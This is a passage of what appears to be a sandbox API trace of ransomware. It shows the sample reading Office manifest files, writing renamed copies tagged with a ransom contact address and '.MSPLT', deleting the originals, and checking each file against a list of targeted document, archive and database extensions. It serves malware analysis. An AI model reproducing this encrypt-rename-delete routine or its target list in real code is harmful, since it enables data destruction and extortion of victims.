Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0177.086] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=1261) returned 1 [0177.086] CloseHandle (hObject=0x2f4) returned 1 [0177.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml")) returned 0x220 [0177.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0177.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0177.087] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0177.087] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0177.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0177.088] GetLastError () returned 0x0 [0177.088] ReadFile (in: hFile=0x2f4, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x4ed, lpOverlapped=0x0) returned 1 [0177.099] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x4f0, lpOverlapped=0x0) returned 1 [0177.100] ReadFile (in: hFile=0x2f4, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0177.100] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13e, lpOverlapped=0x0) returned 1 [0177.100] SetEndOfFile (hFile=0x37c) returned 1 [0177.101] CloseHandle (hObject=0x37c) returned 1 [0177.101] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0177.102] SetEndOfFile (hFile=0x2f4) returned 1 [0177.102] CloseHandle (hObject=0x2f4) returned 1 [0177.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0177.103] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml")) returned 1 [0177.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0177.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0177.103] lstrlenW (lpString=".doc") returned 4 [0177.103] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.103] lstrlenW (lpString=".docx") returned 5 [0177.103] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.103] lstrlenW (lpString=".pdf") returned 4 [0177.103] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.104] lstrlenW (lpString=".xls") returned 4 [0177.104] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.104] lstrlenW (lpString=".xlsx") returned 5 [0177.104] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.104] lstrlenW (lpString=".ppt") returned 4 [0177.104] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0177.104] lstrlenW (lpString=".zip") returned 4 [0177.104] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.104] lstrlenW (lpString=".rar") returned 4 [0177.104] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.104] lstrlenW (lpString=".bz2") returned 4 [0177.104] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.104] lstrlenW (lpString=".7z") returned 3 [0177.104] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0177.104] lstrlenW (lpString=".dbf") returned 4 [0177.104] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0177.104] lstrlenW (lpString=".1cd") returned 4 [0177.104] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0177.104] lstrlenW (lpString=".jpg") returned 4 [0177.104] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0177.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0177.104] lstrlenW (lpString=".doc") returned 4 [0177.104] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.104] lstrlenW (lpString=".docx") returned 5 [0177.104] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.104] lstrlenW (lpString=".pdf") returned 4 [0177.104] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.104] lstrlenW (lpString=".xls") returned 4 [0177.104] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.105] lstrlenW (lpString=".xlsx") returned 5 [0177.105] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.105] lstrlenW (lpString=".ppt") returned 4 [0177.105] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0177.105] lstrlenW (lpString=".zip") returned 4 [0177.105] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.105] lstrlenW (lpString=".rar") returned 4 [0177.105] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.105] lstrlenW (lpString=".bz2") returned 4 [0177.105] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.105] lstrlenW (lpString=".7z") returned 3 [0177.105] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0177.105] lstrlenW (lpString=".dbf") returned 4 [0177.105] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0177.105] lstrlenW (lpString=".1cd") returned 4 [0177.105] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0177.105] lstrlenW (lpString=".jpg") returned 4 [0177.105] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.105] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0177.105] lstrlenW (lpString="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 53 [0177.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0177.139] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=19451) returned 1 [0177.139] CloseHandle (hObject=0x2f4) returned 1 [0177.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml")) returned 0x220 [0177.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0177.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0177.140] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0177.140] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0177.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0177.140] GetLastError () returned 0x0 [0177.140] ReadFile (in: hFile=0x2f4, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x4bfb, lpOverlapped=0x0) returned 1 [0177.186] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x4c00, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x4c00, lpOverlapped=0x0) returned 1 [0177.188] ReadFile (in: hFile=0x2f4, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0177.188] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13e, lpOverlapped=0x0) returned 1 [0177.188] SetEndOfFile (hFile=0x37c) returned 1 [0177.188] CloseHandle (hObject=0x37c) returned 1 [0177.189] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0177.189] SetEndOfFile (hFile=0x2f4) returned 1 [0177.190] CloseHandle (hObject=0x2f4) returned 1 [0177.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0177.191] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml")) returned 1 [0177.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0177.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0177.191] lstrlenW (lpString=".doc") returned 4 [0177.191] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.191] lstrlenW (lpString=".docx") returned 5 [0177.191] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.191] lstrlenW (lpString=".pdf") returned 4 [0177.191] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.191] lstrlenW (lpString=".xls") returned 4 [0177.191] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.191] lstrlenW (lpString=".xlsx") returned 5 [0177.191] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.191] lstrlenW (lpString=".ppt") returned 4 [0177.191] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0177.191] lstrlenW (lpString=".zip") returned 4 [0177.192] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.192] lstrlenW (lpString=".rar") returned 4 [0177.192] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.192] lstrlenW (lpString=".bz2") returned 4 [0177.192] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.192] lstrlenW (lpString=".7z") returned 3 [0177.192] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0177.192] lstrlenW (lpString=".dbf") returned 4 [0177.192] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0177.192] lstrlenW (lpString=".1cd") returned 4 [0177.192] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0177.192] lstrlenW (lpString=".jpg") returned 4 [0177.192] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0177.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0177.192] lstrlenW (lpString=".doc") returned 4 [0177.192] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.192] lstrlenW (lpString=".docx") returned 5 [0177.192] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.192] lstrlenW (lpString=".pdf") returned 4 [0177.192] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.192] lstrlenW (lpString=".xls") returned 4 [0177.192] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.192] lstrlenW (lpString=".xlsx") returned 5 [0177.192] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.192] lstrlenW (lpString=".ppt") returned 4 [0177.192] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0177.192] lstrlenW (lpString=".zip") returned 4 [0177.192] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.192] lstrlenW (lpString=".rar") returned 4 [0177.193] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.193] lstrlenW (lpString=".bz2") returned 4 [0177.193] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.193] lstrlenW (lpString=".7z") returned 3 [0177.193] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0177.193] lstrlenW (lpString=".dbf") returned 4 [0177.193] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0177.193] lstrlenW (lpString=".1cd") returned 4 [0177.193] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0177.193] lstrlenW (lpString=".jpg") returned 4 [0177.193] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.193] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0177.193] lstrlenW (lpString="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 53 [0177.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0177.194] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=763363) returned 1 [0177.194] CloseHandle (hObject=0x2f4) returned 1 [0177.194] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml")) returned 0x220 [0177.194] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0177.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0177.194] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0177.194] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0177.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0177.195] GetLastError () returned 0x0 [0177.195] ReadFile (in: hFile=0x2f4, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0xba5e3, lpOverlapped=0x0) returned 1 [0179.356] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xba5f0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xba5f0, lpOverlapped=0x0) returned 1 [0179.385] ReadFile (in: hFile=0x2f4, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0179.386] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13e, lpOverlapped=0x0) returned 1 [0179.386] SetEndOfFile (hFile=0x37c) returned 1 [0179.386] CloseHandle (hObject=0x37c) returned 1 [0179.854] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0179.854] SetEndOfFile (hFile=0x2f4) returned 1 [0181.557] CloseHandle (hObject=0x2f4) returned 1 [0181.557] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0181.558] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml")) returned 1 [0181.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0181.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0181.558] lstrlenW (lpString=".doc") returned 4 [0181.558] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.558] lstrlenW (lpString=".docx") returned 5 [0181.558] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0181.558] lstrlenW (lpString=".pdf") returned 4 [0181.558] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.558] lstrlenW (lpString=".xls") returned 4 [0181.558] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.558] lstrlenW (lpString=".xlsx") returned 5 [0181.558] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0181.558] lstrlenW (lpString=".ppt") returned 4 [0181.558] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0181.558] lstrlenW (lpString=".zip") returned 4 [0181.558] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.558] lstrlenW (lpString=".rar") returned 4 [0181.558] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.558] lstrlenW (lpString=".bz2") returned 4 [0181.559] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.559] lstrlenW (lpString=".7z") returned 3 [0181.559] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0181.559] lstrlenW (lpString=".dbf") returned 4 [0181.559] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0181.559] lstrlenW (lpString=".1cd") returned 4 [0181.559] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0181.559] lstrlenW (lpString=".jpg") returned 4 [0181.559] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0181.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0181.559] lstrlenW (lpString=".doc") returned 4 [0181.559] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.559] lstrlenW (lpString=".docx") returned 5 [0181.559] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0181.559] lstrlenW (lpString=".pdf") returned 4 [0181.559] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.559] lstrlenW (lpString=".xls") returned 4 [0181.559] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.559] lstrlenW (lpString=".xlsx") returned 5 [0181.559] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0181.559] lstrlenW (lpString=".ppt") returned 4 [0181.559] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0181.559] lstrlenW (lpString=".zip") returned 4 [0181.559] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.559] lstrlenW (lpString=".rar") returned 